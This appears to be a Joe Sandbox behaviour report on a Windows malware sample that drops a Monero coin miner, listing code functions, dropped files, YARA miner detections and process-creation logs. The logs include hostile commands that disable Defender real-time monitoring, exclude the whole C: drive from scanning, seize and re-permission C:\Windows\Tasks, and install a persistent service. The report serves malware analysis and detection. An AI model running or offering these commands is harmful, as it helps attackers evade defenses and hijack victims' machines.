                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002B2B62_2_00007FFDFB002B2B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00654B62_2_00007FFDFB00654B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004E7B62_2_00007FFDFB004E7B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB006BA462_2_00007FFDFB006BA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002E0A62_2_00007FFDFB002E0A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B9C62_2_00007FFDFB004B9C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00227A62_2_00007FFDFB00227A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB139AF062_2_00007FFDFB139AF0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00488B62_2_00007FFDFB00488B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0035DA62_2_00007FFDFB0035DA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00375B62_2_00007FFDFB00375B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002F2C62_2_00007FFDFB002F2C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00234262_2_00007FFDFB002342
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0036D462_2_00007FFDFB0036D4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00242862_2_00007FFDFB002428
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0037E762_2_00007FFDFB0037E7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB135F0062_2_00007FFDFB135F00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00591B62_2_00007FFDFB00591B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00623062_2_00007FFDFB006230
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0051D262_2_00007FFDFB0051D2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1B1E4062_2_00007FFDFB1B1E40
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002A9062_2_00007FFDFB002A90
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001C2162_2_00007FFDFB001C21
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01D26062_2_00007FFDFB01D260
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0071C162_2_00007FFDFB0071C1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0045BB62_2_00007FFDFB0045BB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13132062_2_00007FFDFB131320
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00309462_2_00007FFDFB003094
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02520062_2_00007FFDFB025200
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001AEB62_2_00007FFDFB001AEB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00499962_2_00007FFDFB004999
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00731A62_2_00007FFDFB00731A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1B169062_2_00007FFDFB1B1690
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003BF762_2_00007FFDFB003BF7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00276162_2_00007FFDFB002761
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0011CC62_2_00007FFDFB0011CC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002E3262_2_00007FFDFB002E32
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00183962_2_00007FFDFB001839
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005BBE62_2_00007FFDFB005BBE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EE062_2_00007FFDFB003EE0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0024A562_2_00007FFDFB0024A5
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003E1D62_2_00007FFDFB003E1D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00651E62_2_00007FFDFB00651E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0062DA62_2_00007FFDFB0062DA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00320662_2_00007FFDFB003206
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19C99062_2_00007FFDFB19C990
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB006E7E62_2_00007FFDFB006E7E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003DC862_2_00007FFDFB003DC8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB134A4062_2_00007FFDFB134A40
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005CF462_2_00007FFDFB005CF4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00641562_2_00007FFDFB006415
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004DEA62_2_00007FFDFB004DEA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00501562_2_00007FFDFB005015
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00293262_2_00007FFDFB002932
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00588062_2_00007FFDFB005880
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00452062_2_00007FFDFB004520
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005FEC62_2_00007FFDFB005FEC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00373862_2_00007FFDFB003738
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00400C62_2_00007FFDFB00400C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00298762_2_00007FFDFB002987
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001E7962_2_00007FFDFB001E79
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00104162_2_00007FFDFB001041
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00608762_2_00007FFDFB006087
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB134D5062_2_00007FFDFB134D50
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00380562_2_00007FFDFB003805
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00703662_2_00007FFDFB007036
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00111D62_2_00007FFDFB00111D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0B026062_2_00007FFDFB0B0260
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00571D62_2_00007FFDFB00571D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00396862_2_00007FFDFB003968
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002BF362_2_00007FFDFB002BF3
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB14017062_2_00007FFDFB140170
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0071B262_2_00007FFDFB0071B2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00627B62_2_00007FFDFB00627B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0066C262_2_00007FFDFB0066C2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002C5262_2_00007FFDFB002C52
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00313462_2_00007FFDFB003134
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0017E462_2_00007FFDFB0017E4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002EAF62_2_00007FFDFB002EAF
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00733862_2_00007FFDFB007338
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002ABD62_2_00007FFDFB002ABD
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01C62062_2_00007FFDFB01C620
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01C48062_2_00007FFDFB01C480
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012EE62_2_00007FFDFB0012EE
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9AFF0DA365_2_00007FFD9AFF0DA3
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A3B6D65_2_00007FFD9B1A3B6D
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A4AA065_2_00007FFD9B1A4AA0
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A52F265_2_00007FFD9B1A52F2
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B19084F65_2_00007FFD9B19084F
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A56F265_2_00007FFD9B1A56F2
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A659C65_2_00007FFD9B1A659C
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A4DD465_2_00007FFD9B1A4DD4
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe 16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\Aepdvrho.log 3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB00206D appears 82 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FF7B1D92010 appears 52 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB005DDA appears 737 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001C08 appears 121 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001FFF appears 31 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001055 appears 1557 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB004688 appears 138 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB0041F6 appears 47 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001FC3 appears 55 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB0040F7 appears 384 times
                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012EB78 appears 39 times
                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012EC50 appears 56 times
                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012F5F0 appears 31 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FEB78 appears 39 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FEC50 appears 56 times
                                  Source: C:\Windows\Tasks\1.exeCode function: String function: 003FF5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: String function: 0088F5F0 appears 31 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 000000014000C070 appears 34 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 00000001400026B0 appears 34 times
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: String function: 0000000140009B50 appears 48 times
                                  Source: mFfXERcN.log.65.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UtDRkwHy.log.65.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DmmmRJbk.log.65.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: syIwhxhC.log.65.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: brrRNKBn.log.65.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IntelConfigService.exe.26.dr | Static PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
Source: IntelConfigService.exe.26.dr | Static PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
Source: IntelConfigService.exe.26.dr | Static PE information: Resource name: RT_GROUP_ICON type: GLS_BINARY_LSB_FIRST
Source: python3.dll.56.dr | Static PE information: No import functions for PE file found
Source: IYXE4Uz61k.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 53.0.ApplicationsFrameHost.exe.7ff6a9510000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Tasks\ApplicationsFrameHost.exe, type: DROPPED | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: mFfXERcN.log.65.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: UtDRkwHy.log.65.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: DmmmRJbk.log.65.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: syIwhxhC.log.65.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: brrRNKBn.log.65.dr, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: IYXE4Uz61k.exe | Binary or memory string: C.vBp=)
Source: classification engine | Classification label: mal100.spre.troj.adwa.expl.evad.mine.winEXE@116/100@0/2
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Code function: 0_2_00876C74 GetLastError,FormatMessageW, 0_2_00876C74
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 31_2_000000014000A810 GetCurrentThread,OpenThreadToken,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle, 31_2_000000014000A810
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 37_2_000000014000A810 GetCurrentThread,OpenThreadToken,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle, 37_2_000000014000A810
Source: C:\Windows\Tasks\Wmiic.exe | Code function: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 31_2_00000001400133A0
Source: C:\Windows\Tasks\Wmiic.exe | Code function: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 37_2_00000001400133A0
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 31_2_000000014000ACB0 CreateToolhelp32Snapshot,GetLastError,GetLastError,CloseHandle,PostThreadMessageW,Thread32Next,PostThreadMessageW,Thread32Next,GetLastError,GetLastError,CloseHandle, 31_2_000000014000ACB0
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Code function: 0_2_0088A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_0088A6C2
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 31_2_0000000140012160 _snwprintf_s,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError, 31_2_0000000140012160
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 31_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError, 31_2_000000014000A2E0
Source: C:\Windows\Tasks\Wmiic.exe | Code function: 37_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError, 37_2_000000014000A2E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF41c22a.TMP
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
Source: C:\Windows\Bridgeprovider.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\Bridgeprovider.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\c157af4645d8476b01dd23db4d6f694fd791607889a62dd241070f1213919be9
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvxw3c0k.if4.ps1
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Command line argument: sfxname 0_2_0088DF1E
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Command line argument: sfxstime 0_2_0088DF1E
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Command line argument: STARTDLG 0_2_0088DF1E
Source: C:\ProgramData\migrate.exe | Command line argument: c:\programdata 26_2_0012DF1E
Source: C:\ProgramData\migrate.exe | Command line argument: sfxname 26_2_0012DF1E
Source: C:\ProgramData\migrate.exe | Command line argument: sfxstime 26_2_0012DF1E
Source: C:\ProgramData\migrate.exe | Command line argument: STARTDLG 26_2_0012DF1E
Source: C:\Windows\Tasks\1.exe | Command line argument: sfxname 60_2_003FDF1E
Source: C:\Windows\Tasks\1.exe | Command line argument: sfxstime 60_2_003FDF1E
Source: C:\Windows\Tasks\1.exe | Command line argument: STARTDLG 60_2_003FDF1E
Source: C:\Windows\Tasks\1.exe | Command line argument: xzC 60_2_003FDF1E
Source: IYXE4Uz61k.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SUPERFETCH.EXE'
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: IYXE4Uz61k.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | File read: C:\Users\user\Desktop\IYXE4Uz61k.exe
Source: unknown | Process created: C:\Users\user\Desktop\IYXE4Uz61k.exe "C:\Users\user\Desktop\IYXE4Uz61k.exe"
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasks
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProgramData\migrate.exe c:\programdata\migrate.exe -p4432
Source: C:\ProgramData\migrate.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
Source: C:\Windows\Tasks\Wmiic.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic" start WMService
Source: C:\Windows\Tasks\Wmiic.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
Source: unknown | Process created: C:\Windows\Tasks\Wmiic.exe C:\windows\tasks\Wmiic.exe
Source: C:\Windows\Tasks\Wmiic.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
